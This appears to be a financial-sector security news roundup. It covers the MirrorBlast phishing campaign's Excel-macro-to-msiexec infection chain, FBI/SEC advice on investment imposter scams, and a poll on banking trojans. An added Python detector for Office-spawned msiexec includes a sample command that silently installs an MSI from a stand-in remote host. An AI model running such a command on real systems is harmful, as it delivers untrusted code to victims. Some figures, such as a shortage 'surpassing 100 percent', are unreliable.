
This New Phishing Attack Uses a Weaponized Excel File


A new phishing campaign is targeting financial sector employees by using links to download a ‘weaponized’ Excel document.

MirrorBlast, the phishing campaign, was discovered in early September by security firm ET Labs. Morphisec, a fellow security firm, has since analysed the malware and warns that the malicious Excel files may evade malware-detection systems because of their "extremely lightweight" embedded macros, which makes the campaign especially risky for businesses that rely on detection-based protection and sandboxing.

Macros, or scripts for automating tasks, have grown in popularity among cybercriminals. Although macros are disabled by default in Excel, attackers use social engineering to persuade potential victims to enable them. Despite appearing to be a simple approach, macros have been employed even by state-sponsored hackers because they frequently work.

Earlier this year Microsoft extended its Antimalware Scan Interface (AMSI) for antivirus products to counter the rise in macro malware and a recent trend among attackers of using legacy Excel 4.0 XLM macros (rather than newer VBA macros) to circumvent anti-malware systems.

According to Morphisec, the MirrorBlast attack chain resembles tactics used by TA505, a well-established, financially motivated Russia-based cybercriminal group. The group has been active since at least 2014 and is well known for using a wide range of tools.

Morphisec researcher Arnold Osipov stated in a blog post, "TA505 is most known for frequently changing the malware they use as well as driving global trends in malware distribution." 

Although the MirrorBlast attack begins with a document attached to an email, it then uses a Google feed proxy URL with a SharePoint and OneDrive lure that masquerades as a file-sharing request. When the user clicks the URL, they are sent to a compromised SharePoint site or a bogus OneDrive site. Both variants lead to the malicious Excel document.

The sample MirrorBlast email shows the attackers capitalising on company-issued notices about COVID-related changes to working conditions. Morphisec points out that, because of compatibility issues with ActiveX components, the macro code can only run on a 32-bit version of Office. The macro itself runs a JavaScript script designed to avoid sandboxing by checking whether the computer is in administrator mode. The msiexec.exe process is then launched, which downloads and installs an MSI package.

Morphisec discovered two MSI installer variants that use the legitimate scripting tools KiXtart and REBOL. The KiXtart script transmits information about the victim's workstation to the attackers' command-and-control server, including the domain, computer name, user name and process list. The server then replies with a number indicating whether the Rebol variant should be used. Morphisec states that the Rebol script leads to a remote access tool called FlawedGrace, which the group has used before.
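The Excel-to-msiexec step of the chain described above, as an added detection example (not Morphisec's or ET Labs' code) run over constructed Sysmon-style process-creation events; the event field names and sample values are assumptions, not telemetry from the campaign:

```python
import re
from pathlib import PureWindowsPath

# Office processes that should not normally be the parent of msiexec.exe.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# An http(s) URL ending in .msi on the msiexec command line means a remote package.
REMOTE_MSI = re.compile(r"https?://\S+\.msi\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path (handles either slash style)."""
    return PureWindowsPath(path).name.lower()


def remote_msi_url(command_line):
    """Return the first http(s) .msi URL in a command line, or None."""
    m = REMOTE_MSI.search(command_line)
    return m.group(0) if m else None


def classify(event):
    """Return an alert dict for an Office-parented msiexec.exe event, else None."""
    if basename(event["ParentImage"]) not in OFFICE_PARENTS:
        return None
    if basename(event["Image"]) != "msiexec.exe":
        return None
    url = remote_msi_url(event["CommandLine"])
    # Office spawning msiexec is unusual on its own; a remote package makes it worse.
    return {"host": event["Computer"], "parent": basename(event["ParentImage"]),
            "severity": "high" if url else "medium", "url": url}


def find_suspicious(events):
    return [a for a in (classify(e) for e in events) if a]


# Constructed sample events (assumed Sysmon-like field names, not real telemetry).
# The first one uses the SysWOW64 msiexec, consistent with the 32-bit Office requirement.
SAMPLE_EVENTS = [
    {"Computer": "FIN-WS01", "ParentImage": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "CommandLine": "msiexec.exe /i http://example.invalid/update.msi /q"},
    {"Computer": "FIN-WS02", "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Installers\agent.msi /qn"},
    {"Computer": "FIN-WS03", "ParentImage": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 12288"},
    {"Computer": "FIN-WS04", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\msiexec.exe", "CommandLine": r"msiexec.exe /i C:\Users\Public\setup.msi"},
]

if __name__ == "__main__":
    for alert in find_suspicious(SAMPLE_EVENTS):
        print(alert)
```

Only the two Office-parented msiexec events are flagged; the service-installed package and Excel's print helper pass untouched.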

Osipov added, "TA505 is one of many financially motivated threat groups currently active in the marketplace. They are also one of the most creative, as they have a tendency to constantly shift the attacks they leverage to achieve their goals." 

The FBI and SEC Provided Guidance Against Imposter Scams


The FBI and SEC have issued new guidance to help investors fight financial scams. Users are advised to reject and report fraud if they want to protect their business from scams and avoid paying money to an imposter.

Among various sectors, consumer markets have taken a major hit as stringent lockdowns have brought economic activity to a standstill. 

Cyber-attackers are now employing highly sophisticated tricks to carry out financial scams. According to the FBI's Criminal Investigative Division and the United States Securities and Exchange Commission, fraudsters pose as a real broker or investment adviser in order to trick users. Once the victim's disbelief has been suspended, the fraudsters can trick investors into surrendering more information.

The FBI and the SEC said that cybercriminals are using very advanced techniques to pass as real investment professionals, including fake social media profiles and fake websites that look identical to those of legitimate firms, while hiding their actual locations.

In addition, cybercriminals have been falsifying legitimate documents, such as public reports carrying a real identity and Central Registration Depository (CRD) number but an unregistered firm name. Fraudsters targeting investors reportedly used poor grammar and made spelling errors. Besides the FBI and the SEC, a similar warning was issued by FINRA last week.

"The doctored BrokerCheck report was emailed to potential “clients” using the name and CRD number of a registered investment professional—but with a company that is not registered as a broker-dealer with FINRA..." 

"...The solicitation included other documentation and a request for investors to respond with a photo of their driver’s license and other personal information...", the group wrote. 

Safety Measures

• According to the FBI and SEC recommendation, if someone claims that an investment is legitimate, users should research that person's name on Investor.gov and verify it thoroughly.

• Be wary of offers that sound too good to be true, such as unusually high investment returns.

• Before going ahead with any firm, investors are advised to verify it using FINRA's BrokerCheck.

• The FBI and SEC also highlighted that most licensed and registered investment organizations do not allow investors to pay with credit cards or cryptocurrencies, so you are advised to think twice before investing that way.

• At the time of payment, investors are advised not to send money directly without verifying the recipient. Also, one must not send personal data such as date of birth, driver's license number or any other official documents.

Banking Trojans Rise as the Top Security Concern


According to new research by Blueliv, banking trojans and mobile malware have emerged as the biggest threats to the financial sector. A Twitter poll of 11,000 users conducted by cyberthreat intelligence provider Blueliv revealed that roughly a third of respondents were concerned about the impact banking Trojans (31 percent) and mobile malware (28 percent) will have on financial services organizations and their customers in 2020. Tracking these financial threats, Blueliv researchers observed a 283% increase in Trickbot banking trojan activity and a 130% increase in Dridex botnets. These botnets, observed in Q2 and Q3, are believed to be distributing banking trojans and other malware to financial-sector organizations and their customers.


Skill Shortage and Lack of Visibility of Threats Present a Security Challenge

According to the Blueliv poll, the financial sector is suffering from a major skill shortage in building security programs and identifying security threats. The most pressing challenge is the shortage of skills (28 percent), followed by the high volume of threats and alerts (26 percent) and a lack of visibility into cyber threats (20 percent). Realwire quotes, "This is hardly surprising: as financial services institutions (FSIs) embrace digital processes and new customer interaction channels, so their attack surface grows, making it harder to keep on top of threats ranging from Point-of-Sale (PoS) to ATM malware, mobile apps malware to card skimmers."

Recent data from (ISC)2 shows that the global skills shortage has crossed 4 million. In Europe alone, the shortage has surpassed 100 percent. Daniel Solís, CEO and founder of Blueliv, says, “Organizations in the financial sector face a constantly changing threat landscape. Business priorities have shifted and digital risk management is now central. Because they are such high-value targets for cybercriminal activity, it is imperative that financial services organizations monitor what is happening both inside and outside their networks in real-time to create effective mitigation strategies before, during and after an attack.”

He further commented, “FSI (financial services institutions) security teams can be easily overwhelmed by the number of threat alerts they receive which can very quickly result in alert fatigue and desensitization to real, preventable threats. Threat intelligence can address the cyber skills gap through continuous automated monitoring combined with the human resource to provide context, helping FSIs develop highly-targeted threat detection, prevention, and investigation capabilities.”

Financial organizations are prime targets for attacks. Even with the most sophisticated cyber defense strategies, weak spots remain, and they are being exploited by trojans and malware that fraud risk assessment teams overlook because of the skills shortage and poor threat visibility.